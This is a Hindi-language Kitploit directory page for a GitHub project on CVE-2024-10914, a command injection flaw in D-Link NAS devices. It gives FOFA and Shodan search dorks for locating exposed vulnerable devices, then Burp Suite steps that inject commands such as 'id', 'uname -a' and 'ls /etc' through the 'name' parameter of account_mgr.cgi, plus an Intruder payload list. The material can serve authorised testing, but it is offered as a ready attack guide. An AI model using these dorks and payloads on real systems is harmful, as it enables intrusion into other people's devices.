Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-10914 — CVE-2024-10914_burpsuite के साथ मैन्युअल परीक्षण | Kitploit
उपकरण/GitHubGitHub/egi08/cve-2024-10914
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubegi08/cve-2024-10914

CVE-2024-10914

CVE-2024-10914_burpsuite के साथ मैन्युअल परीक्षण

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-10914 D-Link NAS के लिए कमांड इंजेक्शन भेद्यता परीक्षण_बर्पसुइट के साथ मैन्युअल परीक्षण


कमजोर डिवाइस खोजने के लिए Dork

संभावित रूप से कमजोर D-Link NAS डिवाइस खोजने के लिए निम्नलिखित सर्च dork का उपयोग करें:

root@kitploit:~
FOFA:
app="D_Link-DNS-ShareCenter" && server=="lighttpd/1.4.25-devel-fb150ff"

SHODAN:
"http.title:D-Link" product:"lighttpd" 

यह सर्च स्ट्रिंग उन डिवाइसों की पहचान करने में मदद करती है जो कमजोर D-Link DNS ShareCenter ऐप को Lighttpd सर्वर के उस विशेष संस्करण के साथ चला रहे हैं जो इस भेद्यता से प्रभावित है।


यह मार्गदर्शिका Burp Suite का उपयोग करके D-Link NAS के name पैरामीटर में कमांड इंजेक्शन भेद्यता (CVE-2024-10914) का मैन्युअल रूप से परीक्षण करने के लिए चरण-दर-चरण निर्देश प्रदान करती है। लक्ष्य URL: http://Target।

आवश्यक शर्तें

  • Burp Suite
  • एक वेब ब्राउज़र जो Burp Suite को प्रॉक्सी के रूप में उपयोग करने के लिए कॉन्फ़िगर किया गया हो (सामान्यतः 127.0.0.1:8080 पर सेट)

चरण 1: Burp Suite सेट अप करें

  1. Burp Suite लॉन्च करें: अपनी मशीन पर Burp Suite प्रारंभ करें।
  2. प्रॉक्सी कॉन्फ़िगर करें: ब्राउज़र की प्रॉक्सी सेटिंग्स को पोर्ट 8080 पर 127.0.0.1 पर सेट करके सुनिश्चित करें कि आपका ब्राउज़र Burp Suite को अपने प्रॉक्सी के रूप में उपयोग करने के लिए कॉन्फ़िगर किया गया है।

चरण 2: अनुरोध को इंटरसेप्ट करें

  1. लक्ष्य पर नेविगेट करें: अपने ब्राउज़र में http://Target पर जाएँ।
  2. इंटरसेप्ट सक्षम करें: Burp Suite में, आउटगोइंग अनुरोध को कैप्चर करने के लिए इंटरसेप्ट सुविधा सक्षम करें।

चरण 3: अनुरोध संशोधित करें

  1. कमजोर पैरामीटर का पता लगाएं: इंटरसेप्ट किए गए अनुरोध में, URL में name पैरामीटर खोजें। यह इस प्रकार दिखना चाहिए:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;...;%27
    
  2. एक टेस्ट कमांड इंजेक्ट करें: name पैरामीटर को संशोधित करके उसमें echo "test" जैसा टेस्ट कमांड शामिल करें:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20%22test%22;%27
    
  3. संशोधित अनुरोध भेजें: संशोधित अनुरोध को सर्वर पर अग्रेषित करें।


चरण 4: प्रतिक्रिया का विश्लेषण करें

  1. प्रतिक्रिया जांचें: प्रतिक्रिया में इंजेक्ट किए गए कमांड का आउटपुट देखें। उदाहरण के लिए, यदि सर्वर ने echo "test" निष्पादित किया है, तो आपको यह देखना चाहिए:

    root@kitploit:~
    test
    

चरण 5: भेद्यता का शोषण करें

  1. एक दुर्भावनापूर्ण कमांड इंजेक्ट करें: यदि परीक्षण सफल होता है, तो अधिक परिष्कृत कमांड आज़माएं, जैसे:

    root@kitploit:~
    /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27
    
  2. शोषण अनुरोध भेजें: इस अनुरोध को सर्वर पर अग्रेषित करें।

  3. प्रतिक्रिया का विश्लेषण करें: जांचें कि क्या कमांड का आउटपुट (जैसे, उपयोगकर्ता ID जानकारी) प्रतिक्रिया में मौजूद है।


चरण 6: Burp Suite एक्सटेंशन के साथ स्वचालित करें (वैकल्पिक)

  1. Intruder का उपयोग करें: Burp Suite के Intruder टूल के साथ परीक्षण को स्वचालित करें।

    • अनुरोध पर राइट-क्लिक करें और Intruder को भेजें चुनें।
    • name पैरामीटर को पेलोड स्थिति के रूप में सेट करें।
    • परीक्षण के लिए कमांड की एक सूची को पेलोड के रूप में उपयोग करें।
  2. उदाहरण पेलोड:

    root@kitploit:~
    echo "test"
    id
    uname -a
    ls /etc
    
  3. Intruder प्रारंभ करें: एकाधिक पेलोड का स्वचालित रूप से परीक्षण करने के लिए Intruder अटैक चलाएं।


टूल डाउनलोड करें